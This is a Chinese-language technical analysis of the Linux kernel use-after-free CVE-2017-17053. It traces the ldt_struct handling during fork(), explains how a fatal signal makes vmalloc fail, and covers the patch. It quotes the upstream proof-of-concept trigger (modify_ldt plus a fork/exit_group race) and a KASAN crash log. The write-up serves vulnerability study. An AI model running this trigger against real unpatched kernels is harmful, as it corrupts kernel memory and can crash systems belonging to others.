1. 漏洞信息
- 漏洞等级:高
- 漏洞类型:UAF
- 攻击向量:本地
- 权限要求:低
- 利用公开:否
- 影响范围:<= 4.12.10
- 漏洞补丁:Linux
commit id
:ccd5b3235180eef3cfec337df1c8554ab151b5cc
- 修补日期:2017-08-25
2. CONFIG_MODIFY_LDT_SYSCALL 编译选项简介
要想触发此漏洞,所采用内核需要开启CONFIG_MODIFY_LDT_SYSCALL
编译选项。虽然该编译选项所支持的功能已经不常用了,但是,这个编译选项在常规的Linux内核编译过程中是默认开启的。在一些需要运行16位汇编指令的程序中可能会用到,比如DOSEMU
和wine
。 开了CONFIG_MODIFY_LDT_SYSCALL
编译选项后,就可以使用modify_ldt(2)
这个系统调用了。modify_ldt()
系统调用可以对内核LDT
(local descriptor table )进行读写操作。而这个系统调用就是CVE-2017-17053漏洞产生的一个诱因(注意:不是漏洞点)。
3. 漏洞简述
UAF(Use-After-Free)漏洞在内存中发生的对象是struct ldt_struct ,该对象可以通过modify_ldt()
系统调用进行分配。在内核中具体分配该对象的函数是alloc_ldt_struct()
,其上层函数是init_new_context_ldt()
。在执行fork()
系统调用内核拷贝父进程内存资源时,也会把父进程的ldt_struct
进行拷贝。不过由于比较低级的编码错误,如果alloc_ldt_struct()
执行失败,接着init_new_context_ldt()
进行相应的错误处理,但init_new_context_ldt()
上层函数init_new_context
没有返回相应的错误值,结果无论成功与否都返回0。那么这就导致mm->context.ldt
指向的ldt_struct
没有及时更新,仍然残留着父进程的ldt_struct
。如果该子进程退出并释放这块ldt_struct
,但是父进程仍然保持这对这块对象的引用,那么最终就会产生UAF漏洞。
4. 漏洞还原
- Linux内核版本:
v4.12.10
- 还原所用commit id :
6dd29b3df975582ef429b5b93c899e6575785940
- 涉及文件:
arch/x86/include/asm/mmu_context.h
在commit id
:ccd5b3235180eef3cfec337df1c8554ab151b5cc
补丁信息中,提供了一份PoC:
#include <stdio.h>
#include <asm/ldt.h>
#include <pthread.h>
#include <signal.h>
#include <stdlib.h>
#include <sys/syscall.h>
#include <sys/wait.h>
#include <unistd.h>
static void *fork_thread(void *_arg)
{
fork(); // B
}
int main(void)
{
struct user_desc desc = { .entry_number = 8191 }; // D
syscall(__NR_modify_ldt, 1, &desc, sizeof(desc)); // A
for (;;) {
if (fork() == 0) {
pthread_t t;
// srand(getpid());
pthread_create(&t, NULL, fork_thread, NULL);
// usleep(rand() % 10000);
syscall(__NR_exit_group, 0); // C
}
wait(NULL);
}
}
编译:
$ gcc poc.c -o cve-2017-17053-poc -pthread
触发结果:
[ 53.627718] BUG: KASAN: use-after-free in free_ldt_struct.part.3+0x81/0x90
[ 53.628663] Read of size 4 at addr ffff88006c749208 by task cve-2017-17053-/5426
[ 53.629858]
[ 53.630065] CPU: 6 PID: 5426 Comm: cve-2017-17053- Not tainted 4.12.10+ #8
[ 53.630992] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.1-1ubuntu1 04/01/2014
[ 53.632203] Call Trace:
[ 53.632545] dump_stack+0x4d/0x72
[ 53.633062] print_address_description+0x6a/0x280
[ 53.633743] ? free_ldt_struct.part.3+0x81/0x90
[ 53.634371] kasan_report+0x22b/0x340
[ 53.634883] __asan_report_load4_noabort+0x14/0x20
[ 53.635569] free_ldt_struct.part.3+0x81/0x90
[ 53.636183] destroy_context_ldt+0x60/0x80
[ 53.636740] __mmdrop+0x4f/0x210
[ 53.637279] finish_task_switch+0x37e/0x500
[ 53.637942] schedule_tail+0xe/0xf0
[ 53.638508] ret_from_fork+0x8/0x30
[ 53.639065] RIP: 0033:0x7f034ce2a2d1
[ 53.639636] RSP: 002b:00007f034cd4aff0 EFLAGS: 00000206 ORIG_RAX: 0000000000000038
[ 53.640754] RAX: 0000000000000000 RBX: 00007f034cd4b700 RCX: 00007f034ce2a2d1
[ 53.641836] RDX: 00007f034cd4b9d0 RSI: 00007f034cd4aff0 RDI: 00000000003d0f00
[ 53.642733] RBP: 0000000000000000 R08: 00007f034cd4b700 R09: 00007f034cd4b700
[ 53.643538] R10: 00007f034cd4b9d0 R11: 0000000000000206 R12: 00007f034d0ea220
[ 53.644308] R13: 00007f034cd4b9c0 R14: 00007f034d515040 R15: 0000000000000003
[ 53.645096]
[ 53.645279] Allocated by task 2745:
[ 53.645719] save_stack_trace+0x16/0x20
[ 53.646144] save_stack+0x46/0xd0
[ 53.646505] kasan_kmalloc+0xad/0xe0
[ 53.646867] kmem_cache_alloc_trace+0xcd/0x180
[ 53.647277] alloc_ldt_struct+0x52/0x140
[ 53.647634] init_new_context_ldt+0xe2/0x2e0
[ 53.648027] mm_init.isra.46+0x5c7/0x7e0
[ 53.648391] copy_process.part.52+0x1d66/0x50c0
[ 53.648804] _do_fork+0x133/0x7a0
[ 53.649175] SyS_clone+0x14/0x20
[ 53.649502] do_syscall_64+0x173/0x380
[ 53.649847] return_from_SYSCALL_64+0x0/0x6a
[ 53.650238]
[ 53.650381] Freed by task 5417:
[ 53.650669] save_stack_trace+0x16/0x20
[ 53.651023] save_stack+0x46/0xd0
[ 53.651332] kasan_slab_free+0x72/0xc0
[ 53.651675] kfree+0x8f/0x190
[ 53.651915] free_ldt_struct.part.3+0x63/0x90
[ 53.652258] destroy_context_ldt+0x60/0x80
[ 53.652576] __mmdrop+0x4f/0x210
[ 53.652843] mmput+0x1f8/0x270
[ 53.653115] copy_process.part.52+0x1647/0x50c0
[ 53.653469] _do_fork+0x133/0x7a0
[ 53.653734] SyS_clone+0x14/0x20
[ 53.653992] do_syscall_64+0x173/0x380
[ 53.654293] return_from_SYSCALL_64+0x0/0x6a
5. 漏洞分析
之前有个安全研究员分享了一篇该漏洞的安全分析2017-08-25, 该文章分析比较清晰简洁,但是针对使得alloc_ldt_struct()
执行失败的方式,文中末尾一带而过并没有过多分析。笔者此次文章旨在重新理清思路,并针对某些细节进行详细分析。
1) ldt_struct
对象分配
ldt_struct
对象由alloc_ldt_struct()
分配,在v4.12.10内核代码中搜索,该函数可以看到有如下两处引用:
In folder /home/xxxx/git_new/linux-stable
Found 3 matches for C symbol: alloc_ldt_struct
--------------------------------------------------
arch/x86/kernel/ldt.c:
37 [scope: alloc_ldt_struct] static struct ldt_struct *alloc_ldt_struct(int size)
..
125 [scope: init_new_context] new_ldt = alloc_ldt_struct(old_mm->context.ldt->size);
..
255 [scope: write_ldt] new_ldt = alloc_ldt_struct(newsize);
分别是由write_ldt()
和init_new_context()
引用,如下:
write_ldt()
static int write_ldt(void __user *ptr, unsigned long bytecount, int oldmode)
{
struct mm_struct *mm = current->mm;
struct ldt_struct *new_ldt, *old_ldt;
unsigned int oldsize, newsize;
struct user_desc ldt_info;
struct desc_struct ldt;
int error;
error = -EINVAL;
... snip ...
mutex_lock(&mm->context.lock);
old_ldt = mm->context.ldt;
oldsize = old_ldt ? old_ldt->size : 0;
newsize = max(ldt_info.entry_number + 1, oldsize);
error = -ENOMEM;
new_ldt = alloc_ldt_struct(newsize);// <-------------------
if (!new_ldt)
goto out_unlock;
... snip ...
out_unlock:
mutex_unlock(&mm->context.lock);
out:
return error;
}
init_new_context()
int init_new_context_ldt(struct task_struct *tsk, struct mm_struct *mm)
{
struct ldt_struct *new_ldt;
struct mm_struct *old_mm;
int retval = 0;
... snip ...
new_ldt = alloc_ldt_struct(old_mm->context.ldt->size);// <-------------------
if (!new_ldt) {
retval = -ENOMEM;
goto out_unlock;
}
memcpy(new_ldt->entries, old_mm->context.ldt->entries,
new_ldt->size * LDT_ENTRY_SIZE);
finalize_ldt_struct(new_ldt);
mm->context.ldt = new_ldt;// <-------------------
out_unlock:
mutex_unlock(&old_mm->context.lock);
return retval;
}
以上两个函数都会调用alloc_ldt_struct()
,并且会有相应的函数返回错误码检查。
经过分析,其中到达write_ldt()
的内核函数序列是:sys_modify_ldt() -> write_ldt() -> alloc_ldt_struct()
。到达init_new_context()
的函数序列是:sys_clone() -> _do_fork() -> copy_process() -> mm_init() -> init_new_context() -> init_new_context_ldt() -> alloc_ldt_struct()
。
当分配完ldt_struct
,将会把该对象的地址赋给mm_context_t
结构体的成员变量struct ldt_struct *
,mm_context_t
又是mm_struct
的成员变量,所以最终mm_struct
将会包含一个指向ldt_struct
对象的指针。例如init_new_context_ldt()
有个赋值点:
int init_new_context_ldt(struct task_struct *tsk, struct mm_struct *mm)
{
... snip ...
mm->context.ldt = new_ldt;// <-------------------
... snip ...
}
如果要想在mm_struct
结构体中包含一个指向ldt_struct
对象的有效指针,通过以上分析出的调用序列,我们在用户态使用modify_ldt()
系统调用即可。如PoC中A
处所示。
2)ldt_struct
在fork()
中的拷贝与创建
modify_ldt()
执行完后,当用户态发生fork()
系统调用创建子进程时(如PoC 的B
处),内核将会拷贝相应的父进程内存资源,如下:
static __latent_entropy struct task_struct *copy_process(
unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *child_tidptr,
struct pid *pid,
int trace,
unsigned long tls,
int node)
{
... snip ...
/* Perform scheduler related setup. Assign this task to a CPU. */
retval = sched_fork(clone_flags, p);
if (retval)
goto bad_fork_cleanup_policy;
retval = perf_event_init_task(p);
if (retval)
goto bad_fork_cleanup_policy;
retval = audit_alloc(p);
if (retval)
goto bad_fork_cleanup_perf;
/* copy all the process information */
shm_init_task(p);
retval = security_task_alloc(p, clone_flags);
if (retval)
goto bad_fork_cleanup_audit;
retval = copy_semundo(clone_flags, p);
if (retval)
goto bad_fork_cleanup_security;
retval = copy_files(clone_flags, p);
if (retval)
goto bad_fork_cleanup_semundo;
retval = copy_fs(clone_flags, p);
if (retval)
goto bad_fork_cleanup_files;
retval = copy_sighand(clone_flags, p);
if (retval)
goto bad_fork_cleanup_fs;
retval = copy_signal(clone_flags, p);
if (retval)
goto bad_fork_cleanup_sighand;
retval = copy_mm(clone_flags, p);// <-------------------
if (retval)
goto bad_fork_cleanup_signal;
retval = copy_namespaces(clone_flags, p);
if (retval)
goto bad_fork_cleanup_mm;
retval = copy_io(clone_flags, p);
if (retval)
goto bad_fork_cleanup_namespaces;
retval = copy_thread_tls(clone_flags, stack_start, stack_size, p, tls);
if (retval)
goto bad_fork_cleanup_io;
if (pid != &init_struct_pid) {
pid = alloc_pid(p->nsproxy->pid_ns_for_children);
if (IS_ERR(pid)) {
retval = PTR_ERR(pid);
goto bad_fork_cleanup_thread;
}
}
... snip ...
}
在copy_process()
中,涉及到ldt_struct
对象指针拷贝的点是在dup_mm()
中,内核函数调用序列是...snip.. -> copy_process() -> copy_mm() -> dup_mm()
。其中dup_mm()
中涉及ldt_struct
对象的拷贝操作(struct mm_struct *
包含ldt_struct
指针)如下所示。由于使用了modify_ldt()
系统调用,父进程的mm_struct
定然会包含已经分配的ldt_struct
指针,所以memcpy()
后,新的mm_strcut
中会包含父进程的ldt_struct
对象指针。
static struct mm_struct *dup_mm(struct task_struct *tsk)
{
... snip ...
mm = allocate_mm();
if (!mm)
goto fail_nomem;
memcpy(mm, oldmm, sizeof(*mm)); // <-------------------拷贝点
if (!mm_init(mm, tsk, mm->user_ns)) // <-------------------
goto fail_nomem;
... snip ...
fail_nomem:
return NULL;
}
接着进入mm_init()
函数,该函数就是对新创建的mm_struct
进行初始化工作,其中就包含创建新ldt_struct
的操作,也就是将要执行上文提到的init_new_context()
:
static struct mm_struct *mm_init(struct mm_struct *mm, struct task_struct *p,
struct user_namespace *user_ns)
{
... snip ...
if (init_new_context(p, mm)) // <-------------------
goto fail_nocontext;
mm->user_ns = get_user_ns(user_ns);
return mm;
fail_nocontext:
mm_free_pgd(mm);
fail_nopgd:
free_mm(mm);
return NULL;
}
3) 漏洞代码
接着继续分析 init_new_context()
,init_new_context()
中又会调用init_new_context_ldt()
,如下所示:
static inline int init_new_context(struct task_struct *tsk,
struct mm_struct *mm)
{
#ifdef CONFIG_X86_INTEL_MEMORY_PROTECTION_KEYS
if (cpu_feature_enabled(X86_FEATURE_OSPKE)) {
/* pkey 0 is the default and always allocated */
mm->context.pkey_allocation_map = 0x1;
/* -1 means unallocated or invalid */
mm->context.execute_only_pkey = -1;
}
#endif
init_new_context_ldt(tsk, mm); // <------------------- 漏洞点
return 0;
}
init_new_context_ldt()
上文已分析,会返回一个int型整数值,主要是判断alloc_ldt_struct()
是否成功分配ldt_struct
。按照鲁棒性的代码编程原则,如果alloc_ldt_struct()
执行失败,init_new_context_ldt(tsk, mm);
本应该返回一个错误码,并对其进行错误判断然后进入相应的错误处理流程。但是这里对init_new_context_ldt()
的返回值没有加判断,而是直接返回0,这就导致init_new_context
无论失败与否,最终的结果都将认为它返回成功。
上文已经提到,init_new_context_ldt()
会调用alloc_ldt_struct()
分配一个新的ldt_struct
对象,并更新mm->context.ldt
指针,覆盖掉之前从父进程拷贝来的旧指针。如果alloc_ldt_struct()
执行失败直接返回,则不会更新mm->context.ldt
的旧指针。而且由于init_new_context()
没有对返回值的判断,当作分配成功处理,那么此时子进程中的mm_struct
仍然包含着父进程残留的mm->context.ldt
指针。假设该子进程退出(如PoC的C
处,使用exit_group
内核会产生fatal signal),并执行相应内存释放函数,那么mm->context.ldt
所指向的属于父进程的对象ldt_struct
也会进行释放, 如下代码片段所示。在之后的过程中该对象指针仍然被父进程所能引用,那么最终就会在ldt_struct
对象上产生UAF漏洞。
static __latent_entropy struct task_struct *copy_process(
unsigned long clone_flags,
unsigned long stack_start,
unsigned long stack_size,
int __user *child_tidptr,
struct pid *pid,
int trace,
unsigned long tls,
int node)
{
int retval;
... snip ...
recalc_sigpending();
if (signal_pending(current)) { // <------------------- 一种退出进程的触发方式
retval = -ERESTARTNOINTR;
goto bad_fork_cancel_cgroup;
}
... snip ...
bad_fork_cancel_cgroup:
spin_unlock(¤t->sighand->siglock);
write_unlock_irq(&tasklist_lock);
cgroup_cancel_fork(p);
bad_fork_free_pid:
cgroup_threadgroup_change_end(current);
if (pid != &init_struct_pid)
free_pid(pid);
... snip ...
delayacct_tsk_free(p);
bad_fork_cleanup_count:
atomic_dec(&p->cred->user->processes);
exit_creds(p);
bad_fork_free:
p->state = TASK_DEAD;
put_task_stack(p);
free_task(p);
fork_out:
return ERR_PTR(retval);
}
4)如何使alloc_ldt_struct()
失败
至此,漏洞原理和触发流程基本分析清楚,但是仍然有一个疑点(也是重点)还悬而未决。那就是在用户态通过何种方式,能使得alloc_ldt_struct()
执行失败呢?
先分析下alloc_ldt_struct()
的代码:
static struct ldt_struct *alloc_ldt_struct(unsigned int size)
{
struct ldt_struct *new_ldt;
unsigned int alloc_size;
if (size > LDT_ENTRIES)
return NULL;
new_ldt = kmalloc(sizeof(struct ldt_struct), GFP_KERNEL);
if (!new_ldt)
return NULL;
BUILD_BUG_ON(LDT_ENTRY_SIZE != sizeof(struct desc_struct));
alloc_size = size * LDT_ENTRY_SIZE;
if (alloc_size > PAGE_SIZE)
new_ldt->entries = vzalloc(alloc_size); // <-------------------
else
new_ldt->entries = (void *)get_zeroed_page(GFP_KERNEL);
if (!new_ldt->entries) {
kfree(new_ldt);
return NULL;
}
new_ldt->size = size;
return new_ldt;
}
代码中会使用kmalloc
分配ldt_struct
,但是我们的目的是让alloc_ldt_struct()
返回失败,也就是返回为NULL。可以很容易发现,当new_ldt->entries
为NULL时,则最终返回结果为NULL,且影响其结果的有这两句:new_ldt->entries = vzalloc(alloc_size);
和new_ldt->entries = (void *)get_zeroed_page(GFP_KERNEL);
,后者我们并不可控,而前者是可控的,因为size
参数可以在用户态指定并传入内核,如PoC的D
处。并且PAGE_SIZE < size < LDT_ENTRIES(8192)
。
vzalloc()
最终会调用__vmalloc_area_node()
,采用的是vmalloc
内存分配方案:
static void *__vmalloc_area_node(struct vm_struct *area, gfp_t gfp_mask,
pgprot_t prot, int node)
{
... snip ...
for (i = 0; i < area->nr_pages; i++) {
struct page *page;
if (fatal_signal_pending(current)) { // <-------------------
area->nr_pages = i;
goto fail_no_warn;
}
if (node == NUMA_NO_NODE)
page = alloc_page(alloc_mask|highmem_mask);
else
page = alloc_pages_node(node, alloc_mask|highmem_mask, 0);
if (unlikely(!page)) {
/* Successfully allocated i pages, free them in __vunmap() */
area->nr_pages = i;
goto fail;
}
area->pages[i] = page;
if (gfpflags_allow_blocking(gfp_mask|highmem_mask))
cond_resched();
}
... snip ...
fail_no_warn:
vfree(area->addr);
return NULL; // <-------------------
}
其中fatal_signal_pending(current)
如果接收到fatal signal
( syscall(__NR_exit_group, 0);
),那么会直接返回NULL,最终alloc_ldt_struct()
也会执行失败。
在补丁信息中(commit id
: ccd5b3235180eef3cfec337df1c8554ab151b5cc
),有提供如下信息:
Note: the reproducer takes advantage of the fact that alloc_ldt_struct()
may use vmalloc() to allocate a large ->entries array, and after
commit:
5d17a73a2ebe ("vmalloc: back off when the current task is killed")
it is possible for userspace to fail a task's vmalloc() by
sending a fatal signal, e.g. via exit_group(). It would be more
difficult to reproduce this bug on kernels without that commit.
5d17a73a2ebe ("vmalloc: back off when the current task is killed")
,显示在vmalloc
内核内存分配方式下,如果任务被kill掉,那么vmalloc会提前进行返回。这么做的目的也是为了节约系统内存,以防内存资源滥用。具体5d17a73a2ebe
commit细节如下:
root@xxx:~/git_new/linux-stable# git show 5d17a73a2ebe
commit 5d17a73a2ebeb8d1c6924b91e53ab2650fe86ffb
Author: Michal Hocko <mhocko@suse.com>
Date: Fri Feb 24 14:58:53 2017 -0800
vmalloc: back off when the current task is killed
__vmalloc_area_node() allocates pages to cover the requested vmalloc
size. This can be a lot of memory. If the current task is killed by
the OOM killer, and thus has an unlimited access to memory reserves, it
can consume all the memory theoretically. Fix this by checking for
fatal_signal_pending and back off early.
Link: http://lkml.kernel.org/r/20170201092706.9966-4-mhocko@kernel.org
Signed-off-by: Michal Hocko <mhocko@suse.com>
Reviewed-by: Christoph Hellwig <hch@lst.de>
Cc: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
Cc: Al Viro <viro@zeniv.linux.org.uk>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
diff --git a/mm/vmalloc.c b/mm/vmalloc.c
index d89034a393f2..011b446f8758 100644
--- a/mm/vmalloc.c
+++ b/mm/vmalloc.c
@@ -1642,6 +1642,11 @@ static void *__vmalloc_area_node(struct vm_struct *area, gfp_t gfp_mask,
for (i = 0; i < area->nr_pages; i++) {
struct page *page;
+ if (fatal_signal_pending(current)) {
+ area->nr_pages = i;
+ goto fail;
+ }
+
if (node == NUMA_NO_NODE)
page = alloc_page(alloc_mask);
else
6. 漏洞补丁
Diffstat
-rw-r--r-- arch/x86/include/asm/mmu_context.h 4
1 files changed, 1 insertions, 3 deletions
diff --git a/arch/x86/include/asm/mmu_context.h b/arch/x86/include/asm/mmu_context.h
index 265c907..7a234be 100644
--- a/arch/x86/include/asm/mmu_context.h
+++ b/arch/x86/include/asm/mmu_context.h
@@ -140,9 +140,7 @@ static inline int init_new_context(struct task_struct *tsk,
mm->context.execute_only_pkey = -1;
}
#endif
- init_new_context_ldt(tsk, mm);
-
- return 0;
+ return init_new_context_ldt(tsk, mm);
}
static inline void destroy_context(struct mm_struct *mm)
{
7. 总结
虽然漏洞是由于较为低级的编码错误所引入的,且补丁也较为简单,但是其中涉及的细节还是极有意思的,比如:内核中fork进程的细节和vmalloc
分配时所受外界的影响。另外这种漏洞模型也是值得继续探究的。关于此漏洞的漏洞利用,笔者认为其利用的难度较大。因为fork、exit_group和alloc_ldt_struct三者发生的时机较为紧凑,这就导致利用时refill object难度提高不少。如果你有该漏洞利用的思路或者发现我的漏洞分析有什么错误,欢迎联系我,对我进行批评斧正。
qq: 3453203911